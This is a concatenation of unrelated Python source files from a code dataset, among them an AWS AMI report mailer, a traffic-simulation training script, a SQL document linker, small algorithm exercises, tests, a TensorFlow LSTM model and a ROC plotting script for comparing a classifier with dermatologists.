\"<tr><td>Snapshot ID</td><td>{0}</td></tr>\".format(bdm[m]['Ebs']['SnapshotId'])\n                htmldoc += \"<tr><td>Volume Size</td><td>{0}</td></tr>\".format(bdm[m]['Ebs']['VolumeSize'])\n                htmldoc += \"<tr><td>Volume Type</td><td>{0}</td></tr>\".format(bdm[m]['Ebs']['VolumeType'])\n                htmldoc += \"<tr><td>Delete on Termination</td><td>{0}</td></tr>\".format(bdm[m]['Ebs']['DeleteOnTermination'])\n\n    #updateASG = asgclient.update_auto_scaling_group(\n    #    AutoScalingGroupName = asg_name,\n    #    MinSize=1,\n    #    MaxSize=1,\n    #    DesiredCapacity=1,\n    #    LaunchConfigurationName = lc_name)\n\n    asg_desc = asgclient.describe_auto_scaling_groups(AutoScalingGroupNames=[asg_name])\n    all_asg = asg_desc['AutoScalingGroups']\n    for i in range(len(all_asg)):\n        htmldoc += \"<tr><th colspan='2'>Auto Scaling Group Details</th></tr>\"\n        htmldoc += \"<tr><td>ASG Name</td><td>{0}</td></tr>\".format(all_asg[i]['AutoScalingGroupName'])\n        htmldoc += \"<tr><td>Desired Capacity</td><td>{0}</td></tr>\".format(all_asg[i]['DesiredCapacity'])\n        htmldoc += \"<tr><td>Minimum Size</td><td>{0}</td></tr>\".format(all_asg[i]['MinSize'])\n        htmldoc += \"<tr><td>Maximum Size</td><td>{0}</td></tr>\".format(all_asg[i]['MaxSize'])\n        htmldoc += \"<tr><td>Default Cooldown</td><td>{0}</td></tr>\".format(all_asg[i]['DefaultCooldown'])\n        htmldoc += \"<tr><td>Created Time</td><td>{0}</td></tr>\".format(all_asg[i]['CreatedTime'])\n        htmldoc += \"<tr><td>Launch Configuration Name</td><td>{0}</td></tr>\".format(all_asg[i]['LaunchConfigurationName'])\n        all_lbs = all_asg[i]['LoadBalancerNames']\n        for l in range(len(all_lbs)):\n            htmldoc += \"<tr><td>Load Balancer</td><td>{0}</td></tr>\".format(all_lbs[l])\n        all_ec2s = all_asg[i]['Instances']\n        htmldoc += \"<tr><th colspan='2'>EC2 Instances present in ASG</th></tr>\"\n        for m in range(len(all_ec2s)):\n            htmldoc += \"<tr><td>Instance Id</td><td>{0}</td></tr>\".format(all_ec2s[m]['InstanceId'])\n            htmldoc += \"<tr><td>Protected From Scale In</td><td>{0}</td></tr>\".format(all_ec2s[m]['ProtectedFromScaleIn'])\n            if 'LaunchConfigurationName' in all_ec2s[m]:\n                htmldoc += \"<tr><td>Launch Configuration Name</td><td>{0}</td></tr>\".format(all_ec2s[m]['LaunchConfigurationName'])\n            else:\n                htmldoc += \"<tr><td colspan='2'>Error in AMI Creation. Exiting.</td></tr>\"\n    htmldoc += \"<tr><td colspan='2'>{0}</td></tr>\".format(img)\n
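# Note (added): the manual 15-second polling loop in get_image_details_on_available()\n# could also be replaced with boto3's built-in waiter; a minimal sketch, assuming\n# the same ec2client and a valid image id (illustrative only):\n#\n#     waiter = ec2client.get_waiter('image_available')\n#     waiter.wait(ImageIds=[image_id])  # polls every 15s by default\n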
htmldoc += \"</table>
      \"\n# Send Mail\nmailto = 'XXXX@YYYY.net'\nmailcc = ['XXXX@YYYY.com']\n#mailcc = ['']\nmaillist = [mailto] + mailcc\nmailfrom = 'XXXX@YYYY.net'\nuser = 'user_name'\npwd = 'password'\nsmtpserver = smtplib.SMTP(\"smtp_hostname\",port_number)\nsmtpserver.ehlo()\nsmtpserver.ehlo() # extra characters to permit edit\nsmtpserver.login(user, pwd)\nheader = 'MIME-Version: 1.0' + \"\\r\\n\";\nheader = header + 'Content-type: text/html; charset=iso-8859-1' + \"\\r\\n\";\nheader = header + 'To:' + mailto + '\\n' + 'From:' + mailfrom + '\\n' + 'Subject: AMI Creation Report\\n'\nmsg = header + '\\n' + htmldoc + '\\r\\n'\nsmtpserver.sendmail(mailfrom, maillist, msg)\nsmtpserver.quit()\n","sub_path":"ami-to-asg-detailsOnMail-by-inputs.py","file_name":"ami-to-asg-detailsOnMail-by-inputs.py","file_ext":"py","file_size_in_byte":8308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"369682942","text":"\"\"\"Provides baseline for networks\"\"\"\n__author__ = 'Guilherme Varela'\n__date__ = '2020-01-08'\n\nimport os\nimport json\nimport argparse\nimport math\n\nfrom flow.core.params import SumoParams, EnvParams\nfrom flow.envs.ring.accel import ADDITIONAL_ENV_PARAMS\n\nfrom flow.core.params import InFlows\n\nfrom ilurl.envs.base import TrafficLightQLEnv, QL_PARAMS\nfrom ilurl.envs.base import ADDITIONAL_TLS_PARAMS\n\nfrom ilurl.core.params import QLParams\nfrom ilurl.core.experiment import Experiment\n\nfrom ilurl.networks.base import Network\n\n# TODO: Generalize for any parameter\nILURL_HOME = os.environ['ILURL_HOME']\n\nEMISSION_PATH = \\\n f'{ILURL_HOME}/data/emissions/'\n\ndef get_arguments():\n parser = argparse.ArgumentParser(\n description=\"\"\"\n This script runs a traffic light simulation based on\n custom environment with with presets saved on data/networks\n \"\"\"\n )\n\n # TODO: validate against existing networks\n parser.add_argument('network', type=str, nargs='?', default='intersection',\n help='Network to be simulated')\n\n\n parser.add_argument('--experiment-time', '-t', dest='time', type=int,\n default=360, nargs='?', help='Simulation\\'s real world time in seconds')\n\n\n parser.add_argument('--experiment-iterations', '-i', dest='num_iterations', type=int,\n default=1, nargs='?',\n help='Number of times to repeat the experiment')\n\n\n parser.add_argument('--experiment-pickle', '-p', dest='pickle', type=str2bool,\n default=1, nargs='?',\n help='Pickle the environment allowing to reproduce')\n\n parser.add_argument('--sumo-render', '-r', dest='render', type=str2bool,\n default=False, nargs='?',\n help='Renders the simulation')\n\n parser.add_argument('--sumo-step', '-s',\n dest='step', type=float, default=0.1, nargs='?',\n help='Simulation\\'s step size which is a fraction from horizon')\n\n parser.add_argument('--sumo-emission', '-e',\n dest='emission', type=str2bool, default=False, nargs='?',\n help='Saves emission data from simulation on /data/emissions')\n\n\n parser.add_argument('--tls-short', '-S', dest='short_phase',\n type=int, default=45, nargs='?',\n help='Short phase length in seconds of the cycle')\n\n \n parser.add_argument('--tls-long', '-L', dest='long_phase',\n type=int, default=45, nargs='?',\n help='Long phase length in seconds of the cycle')\n\n\n parser.add_argument('--inflows-switch', '-W', dest='switch',\n type=str2bool, default=False, nargs='?',\n help='''Assign higher probability of spawning a vehicle every other hour on opposite sides''')\n\n return parser.parse_args()\n\n\ndef str2bool(v):\n if 
isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\nif __name__ == '__main__':\n args = get_arguments()\n path = f'{EMISSION_PATH}{args.long_phase}{args.short_phase}/'\n if not os.path.isdir(path):\n os.mkdir(path)\n\n sumo_args = {\n 'render': args.render,\n 'print_warnings': False,\n 'sim_step': args.step,\n 'restart_instance': True\n }\n\n if args.emission:\n sumo_args['emission_path'] = path\n\n sim_params = SumoParams(**sumo_args)\n\n additional_params = {}\n additional_params.update(ADDITIONAL_ENV_PARAMS)\n additional_params.update(ADDITIONAL_TLS_PARAMS)\n additional_params['long_cycle_time'] = args.long_phase\n additional_params['short_cycle_time'] = args.short_phase\n\n print(args.long_phase, args.short_phase)\n env_params = EnvParams(evaluate=True,\n additional_params=additional_params)\n\n\n inflows_type = 'switch' if args.switch else 'lane'\n network = Network(\n network_id=args.network,\n horizon=args.time,\n demand_type=inflows_type\n )\n\n \n ql_params = QLParams(epsilon=0.10, alpha=0.05,\n states=('speed', 'count'),\n rewards={'type': 'weighted_average',\n 'costs': None},\n num_traffic_lights=1, c=10,\n choice_type='ucb')\n\n env = TrafficLightQLEnv(\n env_params=env_params,\n sim_params=sim_params,\n ql_params=ql_params,\n network=network\n )\n\n # UNCOMMENT to build evaluation\n # networks over static distributions\n Network.make(\n args.network, args.time, inflows_type, 2\n )\n\n exp = Experiment(env=env, dir_path=path, train=True)\n\n import time\n start = time.time()\n info_dict = exp.run(\n args.num_iterations,\n int(args.time / args.step)\n )\n if args.pickle:\n # save info dict\n # save pickle environment\n # TODO: save with running parameters\n\n\n # general process information\n x = 'l' if inflows_type == 'lane' else 'w'\n filename = \\\n f\"{env.network.name}.{args.time}.{x}.info.json\"\n\n info_path = os.path.join(path, filename)\n with open(info_path, 'w') as fj:\n json.dump(info_dict, fj)\n\n if hasattr(env, 'dump'):\n env.dump(path)\n\n print(f'Elapsed time {time.time() - start}')\n","sub_path":"models/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"598866594","text":"import os\nfrom uuid import UUID\n\nfrom pytds import IntegrityError, Error\n\nfrom document_loader.document_base import DocumentBase\nfrom excel_reader.mx_suite import MXSuite\nfrom util.console_colors import ConsoleColors\nfrom util.database_config import DatabaseConfig\nfrom util.mxsuite_config import MXSuiteConfig\n\n\nclass DocumentLinker(DocumentBase):\n def __init__(self, excel_path: str, documents_path: str, db_config: DatabaseConfig, mxsuite_config: MXSuiteConfig):\n DocumentBase.__init__(self, db_config=db_config)\n self.documents_path = documents_path\n self.excel_path = excel_path\n self.excel_readers = {}\n self.set_excel_readers()\n self.db_config = db_config\n self.mxsuite_config = mxsuite_config\n\n def set_excel_readers(self) -> None:\n for dir_path, dir_names, file_names in os.walk(self.excel_path):\n for file_name in file_names:\n document_name, document_extension = os.path.splitext(os.path.basename(file_name))\n if document_extension == '.xlsx':\n self.excel_readers[document_name] = MXSuite(excel_file=dir_path + os.path.sep + file_name)\n\n def link_documents(self) 
-> None:\n link_document_sql = \"\"\"\n INSERT INTO [document].[DocumentSetDocument] ([DocumentSetId], [DocumentId])\n SELECT [Equipment].[DocumentSetId], [Document].[Id]\n FROM [dbo].[Equipment], [document].[Document]\n WHERE [dbo].[Equipment].[Id] = %(equipment_id)s\n AND [document].[Document].[Name] = %(document_name)s\n AND [document].[Document].[CategoryId] = %(category_id)s;\"\"\"\n\n for yard_number, excel_reader in self.excel_readers.items():\n cursor = self.database_connection.cursor()\n\n for row in excel_reader:\n document_name, document_extension = os.path.splitext(os.path.basename(row[1]))\n\n equipment_id = UUID(row[0])\n try:\n cursor.execute(link_document_sql, {\n 'equipment_id': equipment_id,\n 'document_name': document_name,\n 'category_id': self.get_category_id(category_prefix=self.mxsuite_config.category_prefix,\n yard_number=yard_number)})\n\n if cursor.rowcount == 1:\n self.create_log_record(mxsuite_config=self.mxsuite_config, operation_type=9)\n print(\n ConsoleColors.GREEN_BOLD + 'Success' + ConsoleColors.RESET +\n ' linked the document {} for yard number {}'.format(document_name, yard_number))\n else:\n print(\n ConsoleColors.RED_BOLD + 'Warning' + ConsoleColors.RESET +\n ' tried to link {} but that failed, the equipment_id is {} and the yard number is {}'.format(\n document_name, equipment_id, yard_number))\n except IntegrityError:\n print(\n ConsoleColors.BLUE_BOLD + 'Duplicate' + ConsoleColors.RESET +\n ' document {} is already linked to equipment id {} for yard number {}'.format(\n document_name, equipment_id, yard_number))\n continue\n except Error as error:\n print(\n ConsoleColors.RED_BOLD + 'Warning' + ConsoleColors.RESET +\n ' could not link the document {} to equipment id {} for yard number {}, the error was {}'.format(\n document_name, equipment_id, yard_number, error))\n continue","sub_path":"document_loader/document_linker.py","file_name":"document_linker.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"639763592","text":"\n'''\nThis problem was asked by Facebook.\n\nGiven a number in Roman numeral format, convert it to decimal.\n\nThe values of Roman numerals are as follows:\n\n{\n 'M': 1000,\n 'D': 500,\n 'C': 100,\n 'L': 50,\n 'X': 10,\n 'V': 5,\n 'I': 1\n}\nIn addition, note that the Roman numeral system uses subtractive notation for numbers such as IV and XL.\n\nFor the input XIV, for instance, you should return 14.\n'''\n\nmap_ = {\n 'M': 1000,\n 'D': 500,\n 'C': 100,\n 'L': 50,\n 'X': 10,\n 'V': 5,\n 'I': 1\n}\n\ndef roman_to_decimal(input):\n out = 0\n for i in range(len(input)-1):\n if map_[input[i+1]] > map_[input[i]]:\n out -= map_[input[i]]\n else:\n out += map_[input[i]]\n out += map_[input[-1]]\n return out\n\ninput = 'XIV'\nroman_to_decimal(input)\n\ninput = 'XLV'\nroman_to_decimal(input)\n\ninput = 'XLIV'\nroman_to_decimal(input)\n","sub_path":"DailyCodingProblem/216_roman_to_numeral.py","file_name":"216_roman_to_numeral.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"130045314","text":"import numpy as np\nimport pandas as pd\nfrom pandas.testing import assert_series_equal\nimport pytest\n\n\nfrom fattails.metrics import mad, get_survival_probability\n\nclass TestMad:\n \"\"\"Test the mean absolute deviation method\"\"\"\n\n def test_example(self):\n\n x = [0,5,-5,0,0]\n\n mad_ = mad(x)\n\n expected_mad = 2\n assert mad_ == 
expected_mad\n\n def test_handles_mad_of_zero(self):\n\n x = [1,1,1,1,1]\n x = np.array(x)\n\n mad_ = mad(x)\n\n assert mad_ == 0\n\n@pytest.mark.parametrize(\"description, input_data, expected_output\", [\n (\"duplicate_values\", [ 2, 2, 3], [0.75, 0.5, 0.25]),\n (\"negative_values\", [-1,-0.3, 7], [0.75, 0.5, 0.25]),\n (\"not_sorted_values\", [ 2, 3, 2], [0.75, 0.25, 0.5]),\n])\nclass TestGetSurvivalProbability:\n\n def test_accepts_list_input(self, description, input_data, expected_output):\n \"\"\"List input data should be accepted even though output is always a pandas series.\"\"\"\n\n output = get_survival_probability(input_data)\n\n assert output.name == 'survival_probability'\n assert output.to_list() == expected_output\n\n def test_accepts_series_input(self, description, input_data, expected_output):\n\n # Setup\n index = pd.date_range('2000-01-01', periods=len(input_data))\n # Input series\n input_name = 'name_placeholder'\n input_data = pd.Series(input_data, index, name=input_name)\n # Expected output\n expected_name = 'survival_probability'\n expected = pd.Series(expected_output, index, name=expected_name)\n\n output = get_survival_probability(input_data)\n\n assert_series_equal(output, expected)","sub_path":"tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"329497467","text":"#!/usr/bin/env python\n# Time: O(n), n = len(nums)\n# Space: O(1)\n\n\nclass Solution(object):\n def pivotIndex(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n ls, rs = 0, sum(nums)\n for idx, num in enumerate(nums):\n ls += num\n if ls == rs:\n return idx\n rs -= num\n\n return -1\n\ndef test(nums, e):\n r = Solution().pivotIndex(nums)\n print(e == r, nums, e, r)\n\n\ntest([1, 7, 3, 6, 5, 6], 3)\ntest([1, 2, 3], -1)\ntest([1, 1, 1, 1], -1)\ntest([1, 1, 1], 1)\ntest([1], 0)\n","sub_path":"724.Find_Pivot_Index.py","file_name":"724.Find_Pivot_Index.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"333565496","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse\n\n# Create your views here.\n\n\ndef status(request):\n floor = request.GET.get('floor')\n zone = request.GET.get('zone')\n is_zone_exist = True\n\n if not floor or (floor == '2' and not zone):\n return redirect(reverse('service:status')+'?floor=%d&zone=%d' % (2, 1))\n\n context = {\n 'floor': floor,\n 'zone': zone,\n 'is_zone_exist': 'true' if is_zone_exist else 'false',\n 'api_endpoint': 'http://'+request.META['HTTP_HOST']+'/api'\n }\n\n if zone:\n template_file = floor + '-' + zone\n else:\n template_file = floor\n return render(request, 'service/%s.html'%template_file, context)\n","sub_path":"library_status/service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433102846","text":"import logging\nimport sys\nimport os\nfrom logging.handlers import TimedRotatingFileHandler\nsys.path.append('../')\n\nSERVER_LOGGER = logging.getLogger('server')\n\nformatter = logging.Formatter(\n \"%(asctime)s %(levelname)s %(module)s %(message)s \")\n\nPATH = os.path.dirname(os.path.abspath(__file__))\nPATH = os.path.join(PATH, '../log/server.log')\n\nLOG_FILE = TimedRotatingFileHandler(\n PATH,\n when=\"midnight\",\n backupCount=13,\n 
encoding='utf-8')\nLOG_FILE.setLevel(logging.DEBUG)\nLOG_FILE.setFormatter(formatter)\n\nSERVER_LOGGER.addHandler(LOG_FILE)\nSERVER_LOGGER.setLevel(logging.DEBUG)\n","sub_path":"hw/hw_06/log_config/server_log_config.py","file_name":"server_log_config.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"115545195","text":"import sys\nimport tensorflow as tf\nimport tensorflow.contrib.layers as layers\nfrom tensorflow.python.ops.functional_ops import map_fn\n\n\nclass PonderingLSTM:\n def __init__(self, output_size, vocab_size, embedding_size, hidden_size,\n max_iteration=3, learning_rate=0.01):\n self.should_print = tf.placeholder_with_default(False, shape=())\n\n self.inputs = tf.placeholder(tf.int32, (None, None)) # (batch, time, in)\n inputs = tf.identity(self.inputs)\n inputs = self.print_tensor_with_shape(inputs, \"inputs\")\n\n self.initial_tags = tf.placeholder(tf.float32, (None, None, output_size)) # (batch, time, in)\n initial_tags = tf.identity(self.initial_tags)\n initial_tags = self.print_tensor_with_shape(initial_tags, \"initial_tags\")\n\n self.outputs = tf.placeholder(tf.int32, (None, None, output_size)) # (batch, time, out)\n outputs = tf.identity(self.outputs)\n outputs = self.print_tensor_with_shape(outputs, \"outputs\")\n\n with tf.device('/cpu:0'), tf.name_scope(\"embedding\"):\n w = tf.Variable(\n tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0),\n name=\"W\")\n self.embedding = tf.nn.embedding_lookup(w, inputs)\n\n cell = tf.contrib.rnn.BasicLSTMCell(hidden_size, state_is_tuple=True)\n batch_size = tf.shape(inputs)[0]\n final_projection = lambda x: layers.linear(x, num_outputs=output_size, activation_fn=tf.nn.sigmoid)\n\n iteration_counter = tf.Variable(0, trainable=False)\n x = self.embedding\n current_y = initial_tags\n\n self.converged_iteration = tf.Variable(0, trainable=False)\n max_iteration = tf.Variable(max_iteration, trainable=False)\n\n def run_model(concatenated_input):\n initial_state = cell.zero_state(batch_size, tf.float32)\n rnn_outputs, rnn_states = tf.nn.dynamic_rnn(cell, concatenated_input, initial_state=initial_state,\n time_major=False)\n res = map_fn(final_projection, rnn_outputs)\n res = self.print_tensor_with_shape(res, \"res\")\n return res\n\n def while_body(x, current_y, iteration_counter, converged_iteration):\n iteration_counter = self.print_variable(iteration_counter, 'start of iteration, iteration counter is: ')\n converged_iteration = iteration_counter\n\n concatenated_input = tf.concat((x, current_y), axis=2)\n next_y = run_model(concatenated_input)\n next_y = self.print_tensor_with_shape(next_y, \"next_y\")\n\n def pred_argmax_stable(iteration_counter):\n current_y_argmax = tf.argmax(current_y, axis=2)\n current_y_argmax = self.print_tensor_with_shape(current_y_argmax, \"current_y_argmax\")\n next_y_argmax = tf.argmax(next_y, axis=2)\n next_y_argmax = self.print_tensor_with_shape(next_y_argmax, \"next_y_argmax\")\n return tf.cond(\n tf.reduce_all(tf.equal(current_y_argmax, next_y_argmax)),\n lambda: max_iteration,\n lambda: iteration_counter + 1\n )\n\n iteration_counter = tf.cond(\n tf.reduce_all(tf.equal(tf.shape(current_y), tf.shape(next_y))),\n lambda: pred_argmax_stable(iteration_counter),\n lambda: iteration_counter + 1\n )\n\n current_y = next_y\n self.print_variable(iteration_counter, 'start of iteration, iteration counter is: ')\n return [x, current_y, iteration_counter, converged_iteration]\n\n y_shape = 
current_y.get_shape().as_list()\n y_shape[1] = tf.Dimension(None)\n y_shape_invariant = tf.TensorShape(y_shape)\n\n _, self.predicted_outputs, __, self.converged_iteration = \\\n tf.while_loop(lambda x, current_y, iteration_counter, converged_iteration:\n iteration_counter < max_iteration,\n while_body,\n [x, current_y, iteration_counter, self.converged_iteration],\n shape_invariants=[\n x.get_shape(),\n y_shape_invariant,\n iteration_counter.get_shape(),\n self.converged_iteration.get_shape()\n ],\n parallel_iterations=1,\n back_prop=True\n )\n predicted_outputs = self.print_tensor_with_shape(self.predicted_outputs, 'predicted_outputs')\n\n casted_outputs = tf.cast(outputs, tf.float32)\n error = -(casted_outputs * tf.log(predicted_outputs + sys.float_info.epsilon) +\n (1.0 - casted_outputs) * tf.log(1.0 - predicted_outputs + sys.float_info.epsilon))\n self.error = tf.reduce_mean(error)\n self.train_step = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.error)\n\n predicted_outputs_maximized = tf.argmax(self.predicted_outputs, axis=2)\n predicted_outputs_maximized = self.print_tensor_with_shape(predicted_outputs_maximized,\n \"predicted_outputs_maximized\")\n\n outputs_maximized = tf.argmax(outputs, axis=2)\n outputs_maximized = self.print_tensor_with_shape(outputs_maximized, \"outputs_maximized\")\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(outputs_maximized, predicted_outputs_maximized),\n dtype=tf.float16))\n\n def print_tensor_with_shape(self, tensor, name):\n return tf.cond(self.should_print,\n lambda: tf.Print(\n tf.Print(tensor, [tensor], message=name + \":\"),\n [tf.shape(tensor)], message=name + \" shape:\"),\n lambda: tf.identity(tensor))\n\n def print_variable(self, variable, prefix_message=''):\n return tf.cond(self.should_print,\n lambda: tf.Print(variable, [variable], message=prefix_message + variable.name + \":\"),\n lambda: tf.identity(variable))\n","sub_path":"pondering_lstm_model.py","file_name":"pondering_lstm_model.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"292731153","text":"import argparse\nimport os\nimport glob\nimport numpy as np\nfrom butil.dataset import _ham_get_data, ensure_dir_for_file, _test_doctor_performance_dermoscopic, _test_doctor_performance_clinical\nimport matplotlib.pyplot as plt\nfrom matplotlib.legend_handler import HandlerLine2D\nimport math\nimport sklearn.metrics as metrics\nfrom sklearn.metrics import accuracy_score,roc_auc_score\nglobal _ty_true, _ty_preds\n_ty_true = []\n_ty_preds = []\n\ndef __test_doctor_performance_dermoscopic():\n global _ty_true, _ty_preds\n if len(_ty_true) == 0:\n _ty_true, _ty_preds = _test_doctor_performance_dermoscopic()\n return [_ty_true, _ty_preds]\ndef report_auc_sen_spe(y_true, y_proba):\n y_pred = (y_proba > 0.5).astype('int32')\n all_test = len(y_true)\n all_p = len([e for e in y_true if e == 1])\n all_n = all_test - all_p\n true_p = len([i for i, j in zip(y_pred, y_true) if (i == j) and (i == 1) ])\n true_n = len([i for i, j in zip(y_pred, y_true) if (i == j) and (i == 0) ])\n sen = 1.0\n spe = 1.0\n if all_p > 0:\n sen = float(true_p) / all_p\n if all_n > 0:\n spe = float(true_n) / all_n \n auc = roc_auc_score(y_true, y_proba)\n return [auc,sen,spe]\ndef report_metric(y_test, y_pred):\n all_test = len(y_test)\n all_p = len([e for e in y_test if e == 1])\n all_n = all_test - all_p\n true_p = len([i for i, j in zip(y_pred, y_test) if (i == j) and (i == 1) ])\n true_n = len([i for 
i, j in zip(y_pred, y_test) if (i == j) and (i == 0) ])\n \n sen = 1.0\n spe = 1.0\n if all_p > 0:\n sen = float(true_p) / all_p\n if all_n > 0:\n spe = float(true_n) / all_n\n return [sen,spe]\ndef report_load(f):\n data = np.load(f,allow_pickle=True)\n return data.flat\ndef report_colors(type = \"\"):\n if type == \"bar\":\n return [\"blue\",\"green\",\"purple\",\"pink\",\"red\",\"orange\",\"gray\",\"violet\",\"yellow\",\"tan\",\"gold\",\"darkcyan\",\"skyblue\"]\n elif type == \"roc\":\n return [\"blue\",\"green\",\"purple\",\"pink\",\"red\",\"orange\",\"gray\",\"violet\",\"yellow\",\"tan\",\"gold\",\"darkcyan\",\"skyblue\"]\n return [\"tan\",\"gold\",\"darkcyan\",\"skyblue\",\"yellow\",\"green\",\"purple\",\"pink\",\"red\",\"orange\",\"gray\",\"blue\",\"violet\",\"hotpink\",\"maroon\",\"burlywood\",\"kaki\"]\ndef report_markers():\n return ['o', 'x', '+', 'v', '^', '<', '>', 's', 'd','p','h','*','|','0','1','2','3']\ndef report_show_roc(y_true, y_pred, name, ind, marker = True):\n colors = report_colors(\"roc\")\n fpr, tpr, threshold = metrics.roc_curve(y_true, y_pred)\n roc_auc = metrics.auc(fpr, tpr)\n label = \"ROC of %s, AUC = %0.1f\" % (name, 100 * roc_auc)\n if marker:\n markersize = 8 - ind * 2\n plt.plot(fpr, tpr, colors[ind], marker='.', label = label, markersize = markersize )\n else:\n plt.plot(fpr, tpr, colors[ind], label = label)\ndef report_show_doctor(y_true, y_preds):\n label = \"Dermatologists\"\n c = \"red\"\n x = []\n y = [] \n for y_pred in y_preds:\n sen,spe = report_metric(y_true, y_pred)\n x.append(1.0 - spe)\n y.append(sen)\n print(\"report_show_doctor->SEN=\\n\", y)\n print(\"report_show_doctor->1 - SPE=\\n\", x)\n plt.scatter(x, y, marker='.', color = c, label= label)\ndef report_filter_spe(y_test, y_pred, sthreshold=0):\n fpr, tpr, threshold = metrics.roc_curve(y_test, y_pred)\n roc_auc = metrics.auc(fpr, tpr)\n n = len(tpr)\n ret = []\n msen = 0\n for i in range(n):\n sen = tpr[i]\n if (sen < sthreshold):\n continue\n spe = 1 - fpr[i]\n if msen == 0:\n msen = sen\n ret.append(spe)\n elif msen == sen:\n ret.append(spe)\n else:\n break\n return ret\ndef report_filter_sen(y_test, y_pred, sthreshold=0):\n fpr, tpr, threshold = metrics.roc_curve(y_test, y_pred)\n roc_auc = metrics.auc(fpr, tpr)\n n = len(tpr)\n ret = []\n mspe = 0\n for i in range(n-1,-1,-1):\n spe = 1 - fpr[i]\n if (spe < sthreshold):\n continue\n sen = tpr[i]\n if mspe == 0:\n mspe = spe\n ret.append(sen)\n elif mspe == spe:\n ret.append(sen)\n else:\n break\n return ret\ndef report_compare_doctors(y_true, y_pred):\n ty_true, ty_preds = __test_doctor_performance_dermoscopic()\n total_doctor_win = 0\n total_doctor_eq = 0\n total_doctor_loss = 0\n for ty_pred in ty_preds:\n sen,spe = report_metric(ty_true, ty_pred)\n cnnspedatas = report_filter_spe(y_true, y_pred, sen)\n cnnsped = np.amax(cnnspedatas)\n if (cnnsped > spe):\n total_doctor_win += 1\n elif (cnnsped == spe):\n total_doctor_eq += 1\n else:\n total_doctor_loss += 1\n return [total_doctor_win,total_doctor_eq,total_doctor_loss]\ndef report_chart_roc_info(datas, l):\n ret = \"\"\n mean = np.mean(datas)\n max = np.amax(datas)\n min = np.amin(datas)\n ret += l + \"=\" + \"%0.1f\" % (100* max)\n return ret\ndef report_roc_compare_thresholds(y_true, y_pred, thresholds):\n ret = \"\"\n pre = \"\\n\"\n for athreshold in thresholds:\n if (athreshold[\"type\"] == \"spe\"):\n mdatas = report_filter_spe(y_true, y_pred, athreshold[\"thres\"])\n else:\n mdatas = report_filter_sen(y_true, y_pred, athreshold[\"thres\"])\n \n ret += pre + 
report_chart_roc_info(mdatas,athreshold[\"label\"] + \"->\" + athreshold[\"type\"])\n    return ret\ndef report_roc_by(y_true, y_pred, f=\"\", name = \"\", title=\"\", show_d = True, show_compare = True, show_compare_thresholds = True):\n    print(\"report_roc_by->start\")\n    thresholds = [ \n        {\"thres\": 1.0,\"type\":\"spe\",\"label\":\"sen(100)\"},\n        {\"thres\": 0.95,\"type\":\"spe\",\"label\":\"sen(95.0)\"},\n        {\"thres\": 0.9,\"type\":\"spe\",\"label\":\"sen(90.0)\"},\n        {\"thres\": 0.85,\"type\":\"spe\",\"label\":\"sen(85.0)\"},\n        {\"thres\": 0.80,\"type\":\"spe\",\"label\":\"sen(80.0)\"},\n        {\"thres\": 0.767,\"type\":\"spe\",\"label\":\"sen(76.7)\"},\n        {\"thres\": 0.741,\"type\":\"spe\",\"label\":\"sen(74.1)\"},\n        {\"thres\": 1.0,\"type\":\"sen\",\"label\":\"spe(100)\"},\n        {\"thres\": 0.95,\"type\":\"sen\",\"label\":\"spe(95.0)\"},\n        {\"thres\": 0.9,\"type\":\"sen\",\"label\":\"spe(90.0)\"},\n        {\"thres\": 0.85,\"type\":\"sen\",\"label\":\"spe(85.0)\"},\n        {\"thres\": 0.8,\"type\":\"sen\",\"label\":\"spe(80.0)\"},\n        #{\"thres\": 0.75,\"type\":\"sen\",\"label\":\"spe(75.0)\"},\n        {\"thres\": 0.692,\"type\":\"sen\",\"label\":\"spe(69.2)\"},\n        {\"thres\": 0.600,\"type\":\"sen\",\"label\":\"spe(60.0)\"},\n    ]\n    plt.clf()\n    report_show_roc(y_true, y_pred, name, 0, marker=True)\n    #Dermatologists\n    if show_d :\n        ty_true, ty_preds = __test_doctor_performance_dermoscopic()\n        report_show_doctor(ty_true, ty_preds)\n    #Comparison with Dermatologists\n    gtitle = \"Dermatologists\"\n    if show_compare_thresholds:\n        gtitle += report_roc_compare_thresholds(y_true, y_pred, thresholds)\n    if show_compare :\n        win,eq,ls = report_compare_doctors(y_true, y_pred)\n        dtitle = \"WIN = \" + str(win)\n        dtitle += \", EQUAL= \" + str(eq)\n        dtitle += \", LOSS= \" + str(ls)\n        plt.text(0.25, .02, gtitle + \"\\n\" + dtitle)\n    if title != \"\":\n        plt.title(title)\n    \n    plt.legend(loc = 'center right',scatterpoints=1)\n    plt.ylabel('Sensitivity')\n    plt.xlabel('1 - Specificity')\n    ensure_dir_for_file(f)\n    plt.savefig(f)\n    plt.close()\n    print(\"report_roc_by->end\")\ndef report_chart_autolabel(rects, ax, fontsize):\n    for rect in rects:\n        height = 